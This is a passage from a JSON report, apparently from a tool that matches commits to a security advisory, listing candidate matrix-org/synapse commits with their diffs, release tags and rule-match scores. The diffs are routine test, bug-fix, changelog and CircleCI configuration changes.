"v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: version, file", - "relevance": 4 - } - ] - }, - { - "commit_id": "ac2acf1524ea33a37b5cdbd4cebcb149c80a48c7", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608045483, - "hunks": 3, - "message": "Remove redundant reading of SynapseRequest.args this didn't seem to be doing a lot, so remove it.", - "diff": [ - "diff --git a/tests/rest/client/v2_alpha/test_account.py b/tests/rest/client/v2_alpha/test_account.py", - "index 11a042f9e..8a898be24 100644", - "--- a/tests/rest/client/v2_alpha/test_account.py", - "+++ b/tests/rest/client/v2_alpha/test_account.py", - "@@ -21,3 +21,2 @@ from email.parser import Parser", - " from typing import Optional", - "-from urllib.parse import urlencode", - "@@ -270,9 +269,2 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", - "- # Send arguments as url-encoded form data, matching the template's behaviour", - "- form_args = []", - "- for key, value_list in request.args.items():", - "- for value in value_list:", - "- arg = (key, value)", - "- form_args.append(arg)", - "-", - " # Confirm the password reset", - "@@ -283,3 +275,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", - " path,", - "- content=urlencode(form_args).encode(\"utf8\"),", - "+ content=b\"\",", - " shorthand=False," - ], - "changed_files": [ - "tests/rest/client/v2_alpha/test_account.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: request", - "relevance": 4 - } - ] - }, - { - "commit_id": "4d17afc255e13aab2806a78c970566b8c2de0484", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607697662, - "hunks": 2, - "message": "Fix users info for remote users (#71)", - "diff": [ - "diff --git a/changelog.d/71.bugfix b/changelog.d/71.bugfix", - "new file mode 100644", - "index 000000000..cad69c7bd", - "--- /dev/null", - "+++ b/changelog.d/71.bugfix", - "@@ -0,0 +1 @@", - "+Fix users info for remote users.", - "diff --git a/synapse/rest/client/v2_alpha/user_directory.py b/synapse/rest/client/v2_alpha/user_directory.py", - "index 5d4be8ada..eeddfa31f 100644", - "--- a/synapse/rest/client/v2_alpha/user_directory.py", - "+++ b/synapse/rest/client/v2_alpha/user_directory.py", - "@@ -209,4 +209,3 @@ class UserInfoServlet(RestServlet):", - "- for user_id, info in res:", - "- user_id_to_info_dict[user_id] = info", - "+ user_id_to_info_dict.update(res)" - ], - "changed_files": [ - "changelog.d/71.bugfix", - "synapse/rest/client/v2_alpha/user_directory.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "71": "" - }, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [ - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 71", - "relevance": 2 - } - ] - }, - { - "commit_id": "ed61fe4ada10eabf66bb4a5c60f2ccca540d1c6e", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608045728, - "hunks": 1, - "message": "changelog", - "diff": [ - "diff --git a/changelog.d/8946.misc b/changelog.d/8946.misc", - "new file mode 100644", - "index 000000000..54502e9b9", - "--- /dev/null", - "+++ b/changelog.d/8946.misc", - "@@ -0,0 +1 @@", - "+Refactor test utilities for injecting HTTP requests." - ], - "changed_files": [ - "changelog.d/8946.misc" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "757b5a0bf6704885b267670c9be4a57d8ff47c30" - ] - ], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - } - ] - }, - { - "commit_id": "cb7e610136a5bd689504395181de1fe069db8187", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607530079, - "hunks": 3, - "message": "Tweak CircleCI config to trigger rebuild of v1.23.1", - "diff": [ - "diff --git a/.circleci/config.yml b/.circleci/config.yml", - "index 088da5573..874f2f765 100644", - "--- a/.circleci/config.yml", - "+++ b/.circleci/config.yml", - "@@ -10,21 +10,5 @@ jobs:", - " - docker_build:", - "- tag: -t matrixdotorg/synapse:${CIRCLE_TAG}", - "- platforms: linux/amd64", - "- - docker_build:", - "- tag: -t matrixdotorg/synapse:${CIRCLE_TAG}", - "+ tag: -t matrixdotorg/synapse:v1.23.1", - " platforms: linux/amd64,linux/arm/v7,linux/arm64", - "- dockerhubuploadlatest:", - "- docker:", - "- - image: docker:git", - "- steps:", - "- - checkout", - "- - docker_prepare", - "- - run: docker login --username $DOCKER_HUB_USERNAME --password $DOCKER_HUB_PASSWORD", - "- - docker_build:", - "- tag: -t matrixdotorg/synapse:latest", - "- platforms: linux/amd64", - "- - docker_build:", - "- tag: -t matrixdotorg/synapse:latest", - "- platforms: linux/amd64,linux/arm/v7,linux/arm64", - "@@ -33,12 +17,3 @@ workflows:", - " jobs:", - "- - dockerhubuploadrelease:", - "- filters:", - "- tags:", - "- only: /v[0-9].[0-9]+.[0-9]+.*/", - "- branches:", - "- ignore: /.*/", - "- - dockerhubuploadlatest:", - "- filters:", - "- branches:", - "- only: master", - "+ - dockerhubuploadrelease" - ], - "changed_files": [ - ".circleci/config.yml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [] - }, - { - "commit_id": "da4050bb8c6cc6bf4c71390a08bf94e1c1b946f3", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607529888, - "hunks": 0, - "message": "Merge branch 'rav/fix_multiarch_builds' into rav/v1.24.0-multiarch", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [] - }, - { - "commit_id": "a4a5c7a35e3231f0a7ad799e0d2fce8c3e69603b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607530432, - "hunks": 0, - "message": "Merge remote-tracking branch 'origin/master' into develop", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "cf7d3c90d6e8bcc2fd196d93c13b5c507ef229b5", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607529672, - "hunks": 0, - "message": "Merge branch 'release-v1.24.0' into develop", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - 